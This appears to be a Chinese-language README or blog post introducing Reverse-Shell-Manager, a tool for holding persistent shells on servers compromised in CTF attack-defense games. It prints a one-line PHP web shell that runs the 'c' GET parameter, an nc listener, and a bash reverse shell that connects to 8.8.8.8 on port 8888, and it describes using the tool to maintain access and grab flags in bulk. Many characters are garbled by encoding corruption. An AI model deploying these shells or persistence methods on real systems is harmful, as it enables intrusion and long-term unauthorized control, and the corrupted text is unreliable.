GitHub 倉庫
介紹一款基于 Python 開發(fā)的 反彈 shell 管理工具 Reverse-Shell-Manager
在 CTF線下賽 的時候 , 如果通過 web 或者 pwn 已經(jīng)拿到了一臺服務(wù)器的控制權(quán)
那么我們可以使用反彈 shell 來對該服務(wù)器進行一個長期的權(quán)限維持
一般反彈 shell 的時候我們會怎么做呢 ?
比如說這里有一個臺服務(wù)器可以 RCE 了
<?php system($_GET[c]);?>
如果要反彈的話 , 我們首先要在自己的服務(wù)器上監(jiān)聽一個端口 :
nc -l 8888
然后再在目標服務(wù)器上執(zhí)行 :
bash -c 'bash -i >&/dev/tcp/8.8.8.8/8888 0>&1'
這樣就能拿到該服務(wù)器的 shell 了
但是
一旦鏈接斷開 , 那么就要重新利用漏洞反彈一個新的 shell
這樣是不是很麻煩 , 而且還會暴露漏洞是如何被利用的
如果對方抓取了流量進行分析的話 , 很快就會把漏洞補上
而且
一般線下賽很多時候需要一些自動化的腳本來運維和進行權(quán)限維持
所以寫了一個小工具 , 希望能有用
大概功能就是 :
監(jiān)聽一個端口 , 可以處理所有連接過來的請求
可以對已經(jīng)連接的主機進行批量管理 (例如一鍵獲取 flag)
保證一臺主機不會出現(xiàn)多個連接
對已經(jīng)下線的主機進行自動檢測
下面有一個簡單的介紹視頻 :
使用視頻
如果可以給你帶來幫助的話 , 可不可以 Star 一下吶 , ヽ(??▽?)ノ
TODO
1. 端口轉(zhuǎn)發(fā)
2. 多層級聯(lián)
...